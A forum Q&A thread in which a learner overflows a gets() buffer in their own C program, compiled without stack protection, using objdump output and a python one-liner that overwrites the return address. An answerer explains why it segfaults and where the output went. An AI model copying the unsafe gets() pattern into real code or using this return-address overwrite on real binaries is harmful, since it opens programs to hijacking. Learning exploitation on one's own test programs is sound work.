exploiting Buffer Overflow using gets() in a simple C program

Panther Coder picture Panther Coder · Jun 10, 2017 · Viewed 7.5k times · Source

I am new to Buffer Overflow exploits and I started with a simple C program.

Code

#include <stdio.h>
#include <strings.h>


void execs(void){
    printf("yay!!");
}

void return_input (void)
{
    char array[30];
    gets(array);
}

int main()
{
    return_input();
    return 0;
}

Compilation stage

I compiled the above program with cc by disabling stack protector as:

cc test.c -o test -fno-stack-protector

The dump of the elf file using objdump is as follows :

0804843b <execs>:
 804843b:   55                      push   %ebp
 804843c:   89 e5                   mov    %esp,%ebp
 804843e:   83 ec 08                sub    $0x8,%esp
 8048441:   83 ec 0c                sub    $0xc,%esp
 8048444:   68 10 85 04 08          push   $0x8048510
 8048449:   e8 b2 fe ff ff          call   8048300 <printf@plt>
 804844e:   83 c4 10                add    $0x10,%esp
 8048451:   90                      nop
 8048452:   c9                      leave  
 8048453:   c3                      ret    

08048454 <return_input>:
 8048454:   55                      push   %ebp
 8048455:   89 e5                   mov    %esp,%ebp
 8048457:   83 ec 28                sub    $0x28,%esp
 804845a:   83 ec 0c                sub    $0xc,%esp
 804845d:   8d 45 da                lea    -0x26(%ebp),%eax
 8048460:   50                      push   %eax
 8048461:   e8 aa fe ff ff          call   8048310 <gets@plt>
 8048466:   83 c4 10                add    $0x10,%esp
 8048469:   90                      nop
 804846a:   c9                      leave  
 804846b:   c3                      ret    

0804846c <main>:
 804846c:   8d 4c 24 04             lea    0x4(%esp),%ecx
 8048470:   83 e4 f0                and    $0xfffffff0,%esp
 8048473:   ff 71 fc                pushl  -0x4(%ecx)
 8048476:   55                      push   %ebp
 8048477:   89 e5                   mov    %esp,%ebp
 8048479:   51                      push   %ecx
 804847a:   83 ec 04                sub    $0x4,%esp
 804847d:   e8 d2 ff ff ff          call   8048454 <return_input>
 8048482:   b8 00 00 00 00          mov    $0x0,%eax
 8048487:   83 c4 04                add    $0x4,%esp
 804848a:   59                      pop    %ecx
 804848b:   5d                      pop    %ebp
 804848c:   8d 61 fc                lea    -0x4(%ecx),%esp
 804848f:   c3                      ret    

So, In order to exploit the buffer(array), we need to find the number of bytes allocated in the return_input stack frame which by looking at the dump,

lea    -0x26(%ebp),%eax

is 0x26 in hex or roughly 38 in decimal. So, giving input as :

38+4(random chars)+(return addr of execs)

would execute the execs function. I used the following:

python -c 'print "a"*42+"\x3b\x84\x04\x08"' | ./test

But output Error was:

Segmentation fault(core dumped)

When I opened the core(core dumped file) using gdb, I could find that the segmentation fault was experienced when executing on the following address :

0xb76f2300

System information:

Ubuntu version : 16.10

Kernel version : 4.8.0-46-generic

Question?

What was I doing wrong in code?

Answer

Antti Haapala picture Antti Haapala · Jun 10, 2017

I guess the reason is simple: you didn't halt/abort your program in the execs. That address 0xb76f2300 is on stack, so I suspect it is the return from the execs that fails when it tries to return to the value of the stored stack pointer.

That you don't see any message is because the stdout is line-buffered, and your message didn't have a new-line character, nor did you flush it explicitly; thus the yay!! will still be in the buffers.

Also, use a debugger.